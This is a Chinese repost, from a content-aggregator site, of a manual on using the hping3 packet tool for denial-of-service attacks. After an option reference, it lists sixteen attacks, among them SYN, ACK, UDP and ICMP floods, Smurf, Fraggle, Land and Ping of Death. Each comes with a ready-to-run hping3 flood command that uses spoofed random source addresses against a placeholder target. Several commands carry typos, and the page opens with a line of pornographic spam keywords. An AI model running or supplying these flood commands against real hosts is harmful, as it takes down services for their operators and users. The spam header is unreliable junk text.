日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

Hping3 拒绝服务攻击手册

發(fā)布時(shí)間:2023/12/14 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Hping3 拒绝服务攻击手册 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

Hping3 拒絕服務(wù)攻擊手冊(cè)

Hping3使用指南

hping 是 面向命令行的用于生成和解析TCP/IP協(xié)議數(shù)據(jù)包匯編/分析的開源工具。它支持TCP,UDP,ICMP和RAW-IP協(xié)議,具有跟蹤路由模式,能夠在覆蓋的信道之間發(fā)送文件以及許多其他功能,支持使用tcl腳本自動(dòng)化地調(diào)用其API。hping是安全審計(jì)、防火墻測(cè)試等工作的標(biāo)配工具。hping 優(yōu)勢(shì)在于能夠定制數(shù)據(jù)包的各個(gè)部分,因此用戶可以靈活對(duì)目標(biāo)機(jī)進(jìn)行細(xì)致地探測(cè)。

  • 主要功能
  • 防火墻測(cè)試
  • 高級(jí)端口掃描
  • 網(wǎng)絡(luò)測(cè)試,使用不同的協(xié)議,TOS,分片
  • 手動(dòng)路徑MTU發(fā)現(xiàn)
  • 在所有支持的協(xié)議下,高級(jí)traceroute
  • 遠(yuǎn)程操作系統(tǒng)指紋
  • 遠(yuǎn)程正常運(yùn)行時(shí)間猜測(cè)
  • TCP/IP協(xié)議棧審計(jì)
  • hping也可以用于學(xué)習(xí)TCP/IP

用法

-h --help 顯示幫助

-v --version 顯示版本

-c --count 發(fā)送數(shù)據(jù)包的數(shù)目

-i --interval 發(fā)送數(shù)據(jù)包間隔的時(shí)間 (uX即X微秒,例如:-i u1000)

--fast 等同 -i u10000(每秒10個(gè)包) --faster 等同 -i u1000(每秒100個(gè)包) --flood 盡最快發(fā)送數(shù)據(jù)包,不顯示回復(fù)。

-n --numeric 數(shù)字化輸出,象征性輸出主機(jī)地址。

-q --quiet 安靜模式

-I --interface 網(wǎng)卡接口
(默認(rèn)路由接口)

-V --verbose 詳細(xì)模式

-D --debug 調(diào)試信息

-z --bind 綁定ctrl+z到ttl(默認(rèn)為目的端口)

-Z --unbind 取消綁定ctrl+z鍵

–beep 對(duì)于接收到的每個(gè)匹配數(shù)據(jù)包蜂鳴聲提示

模式選擇

default mode TCP // 默認(rèn)模式是 TCP

-0 --rawip RAWIP模式,原始IP模式。在此模式下HPING會(huì)發(fā)送帶數(shù)據(jù)的IP頭。即裸IP方式。使用RAWSOCKET方式。

-1 --icmp ICMP模式,此模式下HPING會(huì)發(fā)送IGMP應(yīng)答報(bào),你可以用–ICMPTYPE --ICMPCODE選項(xiàng)發(fā)送其他類型/模式的ICMP報(bào)文。

-2 --udp UDP 模式,缺省下,HPING會(huì)發(fā)送UDP報(bào)文到主機(jī)的0端口,你可以用–baseport --destport --keep選項(xiàng)指定其模式。

-8 --scan SCAN mode. //掃描模式
指定掃描對(duì)應(yīng)的端口。

Example: hping --scan 1-30,70-90 -S www.target.host // 掃描

-9 --listen listen mode // 監(jiān)聽模式

IP 模式

-a --spoof spoof source address //源地址欺騙。偽造IP攻擊,防火墻就不會(huì)記錄你的真實(shí)IP了,當(dāng)然回應(yīng)的包你也接收不到了。

–rand-dest random destionation address mode. see the man. // 隨機(jī)目的地址模式。詳細(xì)使用 man 命令

–rand-source random source address mode. see the man. // 隨機(jī)源地址模式。詳細(xì)使用 man 命令

-t --ttl ttl (默認(rèn) 64) //修改 ttl 值

-N --id id (默認(rèn) 隨機(jī)) // hping 中的 ID 值,缺省為隨機(jī)值

-W --winid 使用win* id字節(jié)順序 //使用winid模式,針對(duì)不同的操作系統(tǒng)。UNIX ,WINDIWS的id回應(yīng)不同的,這選項(xiàng)可以讓你的ID回應(yīng)和WINDOWS一樣。

-r --rel 相對(duì)id字段(估計(jì)主機(jī)流量) //更改ID的,可以讓ID曾遞減輸出,詳見HPING-HOWTO。

-f --frag 拆分?jǐn)?shù)據(jù)包更多的frag. (may pass weak acl) //分段,可以測(cè)試對(duì)方或者交換機(jī)碎片處理能力,缺省16字節(jié)。

-x --morefrag 設(shè)置更多的分段標(biāo)志 // 大量碎片,淚滴攻擊。

-y --dontfrag 設(shè)置不分段標(biāo)志 // 發(fā)送不可恢復(fù)的IP碎片,這可以讓你了解更多的MTU PATH DISCOVERY。

-g --fragoff set the fragment offset // 設(shè)置斷偏移。

-m --mtu 設(shè)置虛擬最大傳輸單元, implies
–frag if packet size > mtu // 設(shè)置虛擬MTU值,當(dāng)大于mtu的時(shí)候分段。

-o --tos type of service (default 0x00), try
–tos help // tos字段,缺省0x00,盡力而為?

-G --rroute includes RECORD_ROUTE option and display
the route buffer // 記錄IP路由,并顯示路由緩沖。

–lsrr 松散源路由并記錄路由 // 松散源路由

–ssrr 嚴(yán)格源路由并記錄路由 // 嚴(yán)格源路由

-H --ipproto 設(shè)置IP協(xié)議字段,僅在RAW IP模式下使用 //在RAW IP模式里選擇IP協(xié)議。設(shè)置ip協(xié)議域,僅在RAW ip模式使用。

ICMP 模式

-C --icmptype icmp類型(默認(rèn)echo請(qǐng)求) // ICMP類型,缺省回顯請(qǐng)求。

-K --icmpcode icmp代號(hào)(默認(rèn)0) // ICMP代碼。

–force-icmp 發(fā)送所有icmp類型(默認(rèn)僅發(fā)送支持的類型) // 強(qiáng)制ICMP類型。

–icmp-gw 設(shè)置ICMP重定向網(wǎng)關(guān)地址(默認(rèn)0.0.0.0)
// ICMP重定向

–icmp-ts 等同
–icmp --icmptype 13 (ICMP 時(shí)間戳) // icmp時(shí)間戳

–icmp-addr 等同
–icmp --icmptype 17 (ICMP 地址子網(wǎng)掩碼) // icmp子網(wǎng)地址

–icmp-help 顯示其他icmp選項(xiàng)幫助 // ICMP幫助

UDP/TCP 模式

-s --baseport base source port (default random) // 缺省隨機(jī)源端口

-p --destport [+][+] destination port(default 0) ctrl+z inc/dec // 缺省隨機(jī)源端口

-k --keep keep still source port // 保持源端口

-w --win winsize (default 64) // win的滑動(dòng)窗口。windows發(fā)送字節(jié)(默認(rèn)64)

-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4) // 設(shè)置偽造tcp數(shù)據(jù)偏移量(取代tcp地址長(zhǎng)度除4)

-Q --seqnum shows only tcp sequence number // 僅顯示tcp序列號(hào)

-b --badcksum (嘗試)發(fā)送具有錯(cuò)誤IP校驗(yàn)和數(shù)據(jù)包。許多系統(tǒng)將修復(fù)發(fā)送數(shù)據(jù)包的IP校驗(yàn)和。所以你會(huì)得到錯(cuò)誤UDP/TCP校驗(yàn)和。

-M --setseq 設(shè)置TCP序列號(hào)

-L --setack 設(shè)置TCP的ack ------------------------------------- (不是 TCP 的 ACK 標(biāo)志位)

-F --fin set FIN flag

-S --syn set SYN flag

-R --rst set RST flag

-P --push set PUSH flag

-A --ack set ACK flag ------------------------------------- (設(shè)置 TCP 的 ACK 標(biāo)志 位)

-U --urg set URG flag // 一大堆IP抱頭的設(shè)置。

-X --xmas set X unused flag (0x40)

-Y --ymas set Y unused flag (0x80)

–tcpexitcode 使用last tcp-> th_flags作為退出碼

–tcp-mss 啟用具有給定值的TCP MSS選項(xiàng)

–tcp-timestamp 啟用TCP時(shí)間戳選項(xiàng)來(lái)猜測(cè)HZ/uptime

使用Hping3構(gòu)造拒絕服務(wù)類攻擊

1、ICMP Flood

ICMP(Internet Control Message Protocol–Internet控制消息協(xié)議)是網(wǎng)絡(luò)層的協(xié)議類似于UDP。ICMP遞送狀態(tài)消息,錯(cuò)誤報(bào)告,回答某些請(qǐng)求,報(bào)告路由信息,并且常用于測(cè)試網(wǎng)絡(luò)的連通性和排查問題。

ICMP Floods類似于UDP不需要任何漏洞,只需要發(fā)送大量的ICMP數(shù)據(jù)包,在處理每一個(gè)數(shù)據(jù)包的時(shí)候資源消耗殆盡導(dǎo)致拒絕服務(wù)。

hping3 -c 10000 -d 120 --icmp -w 64 -p port --flood --rand-sourcet <目標(biāo)IP>

2、udp Flood

UDP洪泛是一種拒絕服務(wù)攻擊,其中大量的用戶數(shù)據(jù)報(bào)協(xié)議(UDP)數(shù)據(jù)包被發(fā)送到目標(biāo)終端,目的是壓倒該設(shè)備的處理和響應(yīng)能力

hping3 -c 50000 -d 120 --udp -w 64 -p port --flood --rand-source <目標(biāo)IP>

3、TCP ACK Flood

對(duì)于短時(shí)間內(nèi)向目標(biāo)發(fā)送大量的的TCP數(shù)據(jù)包,在處理每一個(gè)數(shù)據(jù)包的時(shí)候資源消耗殆盡導(dǎo)致拒絕服務(wù)。

hping3 -c 20000 -d 120 -A -w 64 -p 80 --flood --rand-source <目標(biāo)IP>

4、TCP-SYN Flood

TCP-SYN Flood攻擊又稱半開式連接攻擊,每當(dāng)我們進(jìn)行一次標(biāo)準(zhǔn)的TCP連接,都會(huì)有一個(gè)三次握手的過程,而TCP-SYN Flood在它的實(shí)現(xiàn)過程中只有前兩個(gè)步驟。這樣,服務(wù)方會(huì)在一定時(shí)間處于等待接收請(qǐng)求方ASK消息的狀態(tài)。由于一臺(tái)終端可用的TCP連接是有限的,如果惡意攻擊方快速連續(xù)地發(fā)送此類連接請(qǐng)求,則終端可用TCP連接隊(duì)列很快將會(huì)阻塞,系統(tǒng)資源和可用帶寬急劇下降,無(wú)法提供正常的網(wǎng)絡(luò)服務(wù),從而造成拒絕服務(wù)。

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source <目標(biāo)IP>

5、特殊標(biāo)志位的Dos攻擊

FIN -F RST -F ACK -A SYN -S

設(shè)置 FIN 和 RST 標(biāo)志位的 dos 攻擊

正常情況下,FIN標(biāo)志和RST標(biāo)志是不能同時(shí)出現(xiàn)在一個(gè)TCP報(bào)文中的。而且RFC也沒有規(guī)定IP協(xié)議棧如何處理這樣的畸形報(bào)文,因此,各個(gè)操作系統(tǒng)的協(xié)議棧在收到這樣的報(bào)文后的處理方式也不同,攻擊者就可以利用這個(gè)特征,通過發(fā)送FIN和RST同時(shí)設(shè)置的報(bào)文,來(lái)判斷操作系統(tǒng)的類型,然后針對(duì)該操作系統(tǒng),進(jìn)行進(jìn)一步的攻擊。

hping3 -c 10000 -d 120 -F -R -w 64 -p 80 --flood --rand-source <目標(biāo)IP>

設(shè)置 ACK 和 RST 標(biāo)志位的 dos 攻擊

正常情況下,ACK標(biāo)志和RST標(biāo)志是不能同時(shí)出現(xiàn)在一個(gè)TCP報(bào)文中的。而且RFC也沒有規(guī)定IP協(xié)議棧如何處理這樣的畸形報(bào)文,因此,各個(gè)操作系統(tǒng)的協(xié)議棧在收到這樣的報(bào)文后的處理方式也不同,攻擊者就可以利用這個(gè)特征,通過發(fā)送ACK和RST同時(shí)設(shè)置的報(bào)文,來(lái)判斷操作系統(tǒng)的類型,然后針對(duì)該操作系統(tǒng),進(jìn)行進(jìn)一步的攻擊。

hping3 -c 10000 -d 120 -A —R -w 64 -p 80 --flood --rand-source <目標(biāo)IP>

6、ICMP-Echo flood

ICMP-Echo flooding是指發(fā)送大量ICMP Echo數(shù)據(jù)包。這些數(shù)據(jù)包具有源IP(通常被欺騙以減少IP信譽(yù)機(jī)制的影響)和受害者的目標(biāo)IP

hping3 -c 10000 -d 120 --icmp -C 0 -w 64 -p 80 --flood --rand-sourcet <目標(biāo)IP>

7、TCP Syn-Ack flood

SYN-ACK Flood攻擊正是利用了這一點(diǎn),攻擊者利用工具或者操縱僵尸主機(jī),向目標(biāo)終端發(fā)送大量的SYN-ACK報(bào)文,這些報(bào)文都屬于憑空出現(xiàn)的第二次握手報(bào)文,終端忙于回復(fù)RST報(bào)文,導(dǎo)致資源耗盡,無(wú)法響應(yīng)正常的請(qǐng)求。

hping3 -q -n -a 源ip -S -s 1134 --keep -p 515 -i --faster -c 100 <目標(biāo)ip>

8、Data ack and push flood

當(dāng)與終端連接時(shí),客戶端可以通過設(shè)置ACK標(biāo)志來(lái)請(qǐng)求確認(rèn)已接收到信息,或者它可以通過設(shè)置PUSH標(biāo)志強(qiáng)制終端處理數(shù)據(jù)包中的信息。這兩個(gè)請(qǐng)求都要求終端執(zhí)行比其他類型的請(qǐng)求更多的工作。

hping3 --flood --rand-source -PA -p PORT <目標(biāo)ip>

9、Tcp連接攻擊

Connection Flood是典型的并且非常的有效的利用小流量沖擊大帶寬網(wǎng)絡(luò)服務(wù)的攻擊方式,這種攻擊方式目前已經(jīng)越來(lái)越猖獗。這種攻擊的原理是利用真實(shí)的IP地址向終端發(fā)起大量的連接,并且建立連接之后很長(zhǎng)時(shí)間不釋放,占用終端的資源,造成終端終端上殘余連接(WAIT狀態(tài))過多,效率降低,甚至資源耗盡,無(wú) 法響應(yīng)其他客戶所發(fā)起的連接。

其中一種攻擊方法是每秒鐘向終端發(fā)起大量的連接請(qǐng)求,這類似于固定源IP的SYN Flood攻擊,不同的是采用了真實(shí)的源IP地址。通常這可以在防火墻上限制每個(gè)源IP地址每秒鐘的連接數(shù)來(lái)達(dá)到防護(hù)目的。但現(xiàn)在已有工具采用慢速連接的
方式,也即幾秒鐘才和終端建立一個(gè)連接,連接建立成功之后并不釋放并定時(shí)發(fā)送垃圾數(shù)據(jù)包給終端使連接得以長(zhǎng)時(shí)間保持。這樣一個(gè)IP地址就可以和終端
建立成百上千的連接,而終端可以承受的連接數(shù)是有限的,這就達(dá)到了拒絕服務(wù)的效果

hping3 --tcp-connect --rate=90000 -c 900000 -q <目標(biāo)IP>

10、Large ping

ICMP(Internet Control Message Protocol–Internet控制消息協(xié)議)和IGMP(Internet Group Management Protocol–Internet組管理協(xié)議)是網(wǎng)絡(luò)層的協(xié)議類似于UDP。ICMP遞送狀態(tài)消息,錯(cuò)誤報(bào)告,回答某些請(qǐng)求,報(bào)告路由信息,并且常用于測(cè)試網(wǎng)絡(luò)的連通性和排查問題。IGMP是IP網(wǎng)絡(luò)上的系統(tǒng)和相鄰路由用來(lái)建立和維護(hù)多播組成員關(guān)系的協(xié)議。

ICMP and IGMP Floods類似于UDP不需要任何漏洞,只需要發(fā)送大量的ICMP或IGMP數(shù)據(jù)包,在處理每一個(gè)數(shù)據(jù)包的時(shí)候資源消耗殆盡導(dǎo)致拒絕服務(wù)。

hping3 -d 501 --flood --rand-source -1 -p PORT <目標(biāo)IP>

11、固定源 ICMP 攻擊

偽裝IP攻擊。

hping3 -1 -a 偽裝IP 目標(biāo)IP

12、Ping of Death

Ping of death是一種拒絕服務(wù)攻擊,方法是由攻擊者故意發(fā)送大于65536比特的ip數(shù)據(jù)包給對(duì)方。Ping of death攻擊利用了Internet控制消息協(xié)議(ICMP)和最大傳輸單元(MTU)的特點(diǎn),Ping命令發(fā)送ICMP回應(yīng)請(qǐng)求(ICMP Echo-Request)并記錄收到ICMP回應(yīng)回復(fù)(ICMP Echo-Reply)。MTU定義了具有不同媒體類型的網(wǎng)絡(luò)架構(gòu)的單元最大傳輸量。

如果數(shù)據(jù)包大小大于MTU,數(shù)據(jù)包將被拆分,并在目的主機(jī)重新組合。當(dāng)數(shù)據(jù)包被分解時(shí),數(shù)據(jù)包會(huì)涵蓋一個(gè)“偏移”值,這個(gè)偏移值用于在目的主機(jī)重組數(shù)據(jù)。攻擊者可以將最后的數(shù)據(jù)片段替換為合理的偏移值和較大的數(shù)據(jù)包,這樣將會(huì)超過ICMP回應(yīng)請(qǐng)求數(shù)據(jù)部分的數(shù)量,如果進(jìn)行重組,目的計(jì)算機(jī)將會(huì)重新啟動(dòng)或者崩潰。

hping3 -1 -d 70000 -c 1 <目標(biāo)ip>

13、源端口為 0

訪問UDP/TCP的0端口導(dǎo)致該事件的產(chǎn)生,這是一個(gè)不正常的訪問,暗示著非授權(quán)的網(wǎng)絡(luò)訪問或探測(cè)活動(dòng)。

hping3 -c 10000 -d 120 --tcp -w 64 -p 0 --flood --rand-source +host <目標(biāo)IP>hping3 -c 10000 -d 120 --ucp -w 64 -p 0 --flood --rand-source +host <目標(biāo)IP>

14、ICMP-Smurf attack

ICMP/SMURF攻擊利用的 是網(wǎng)絡(luò)廣播的原理來(lái)發(fā)送大量的連接,而包的源地址就是要攻 擊的機(jī)器本身的地址;因而所有接 收到此包的主機(jī)都將給包的源地 址發(fā)送一個(gè)ICMP回復(fù)包。

hping3 -1 -a 192.168.0.1 192.168.0.255hping3 -1 -a 目標(biāo)ip 目標(biāo)服務(wù)器廣播地址

15、TCP-Land attack

著陸攻擊LAND Attack也是一種拒絕服務(wù)攻擊DOS。LAND 是Local Area Network Denial的縮寫,意思是局域網(wǎng)拒絕服務(wù)攻擊,翻譯為著陸攻擊只是一種錯(cuò)誤的理解。攻擊原理為,攻擊機(jī)向目標(biāo)機(jī)發(fā)送一個(gè)SYN的TCP包,包中的源地址被偽造為目標(biāo)機(jī)的地址。當(dāng)目標(biāo)機(jī)收到包后,會(huì)向自己發(fā)送一個(gè)SYN+ACK的TCP包。然后,目標(biāo)機(jī)向自己發(fā)送一個(gè)ACK包,這樣就自己和自己建立一個(gè)空連接。這個(gè)空連接會(huì)一直持續(xù),直到超時(shí)。當(dāng)目標(biāo)機(jī)被這樣大量欺騙,建立大量空連接,消耗大量的系統(tǒng)資源,導(dǎo)致系統(tǒng)運(yùn)行緩慢,甚至崩潰。

hping3 -S -c 1000000 -a <源IP> -p port <目標(biāo)IP>

16、fraggle attack

Fraggle攻擊對(duì)Smurf攻擊作了簡(jiǎn)單的修改,使用的是UDP應(yīng)答消息而非ICMP。

hping3 -2 -a 目標(biāo)ip 目標(biāo)服務(wù)器廣播地址hping3 -2 -a 192.168.0.1 192.168.0.255

參考: http://www.360doc.com/document/12/0712/13/10339652_223772262.shtml

總結(jié)

以上是生活随笔為你收集整理的Hping3 拒绝服务攻击手册的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。